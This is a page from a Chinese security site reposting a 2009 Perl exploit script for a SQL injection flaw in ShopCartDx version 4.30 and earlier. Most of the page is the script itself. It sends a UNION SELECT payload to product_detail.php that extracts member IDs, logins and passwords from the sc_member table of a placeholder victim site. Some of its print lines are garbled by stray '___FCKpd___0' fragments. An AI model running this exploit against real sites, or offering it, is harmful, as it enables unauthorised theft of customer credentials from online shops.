首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote
来源:http://www.warwolfz.org/ 作者:Dante90 发布时间:2009-07-06  
#!/usr/bin/perl
#[0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote SQL Injection
Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew

use LWP::UserAgent;
use HTTP::Cookies;
use strict;

my $Member_ID = shift or usage();

my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site
Link (Example: http://e-topbiz.com/trafficdemos/shopcartdx1/)
my $Referrer = "http://warwolfz.altervista.org/";

sub SQL_Injection{
    my ($MID) = @_;
    return "./product_detail.php?cid=9&pid=-1 UNION SELECT
1,2,CONCAT_WS(CHAR(32,58,32),mid,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16
FROM sc_member WHERE mid=${MID}/*";
}

my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
            agent => 'Mozilla/5.0',
            max_redirect => 0,
            cookie_jar => $Cookies,
        ) or die $!;

my $Get = $UserAgent->get($HostName.SQL_Injection($Member_ID));

if($Get->content =~ /([0-9]{1,5}) : ([a-zA-Z0-9-_.]{2,15}) :
([a-zA-Z0-9]{1,15})/i){
    refresh($HostName, $1, $2, $3);
    print " * Exploit Successed                                  *\n";
    print " ------------------------------------------------------\n\n";
    system("pause");
}else{
    refresh($HostName, "", "", "");
    print " * Error extracting sensible data.\n";
    print " * Exploit Failed                                     *\n";
    print " ------------------------------------------------------ \n\n";
}


sub usage{
    system("cls");
    {
        print " \n [0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote
SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [uid]                         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}

sub refresh{
    system("cls");
    {
        print " \n [0-Day] ShopCartDx <= v4.30 (product_detail.php) Remote
SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [uid]                         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print " * Victime Site: " . 
___FCKpd___0
[0] . "\n"; print " * Member ID: " .
___FCKpd___0
[1] . "\n"; print " * Login: " .
___FCKpd___0
[2] . "\n"; print " * Password: " .
___FCKpd___0
[3] . "\n"; } #WaRWolFz Crew

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Soulseek versions 157 NS below
·[0-Day] ShopCartDx <= v4.30 (p
·Local root exploit for FreeBSD
·Joomla! versions prior to 1.5.
·win32 xp-sp3 beep and exitproc
·Microsoft DirectShow MPEG2Tune
·Almnzm 2.0 Remote Blind SQL In
·Microsoft DirectShow MPEG2Tune
·YourTube <= 2.0 Arbitrary Data
·mail XSS的脚本
·Oracle 10g SYS.LT.COMPRESSWORK
·Apple Safari 4.x JavaScript Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved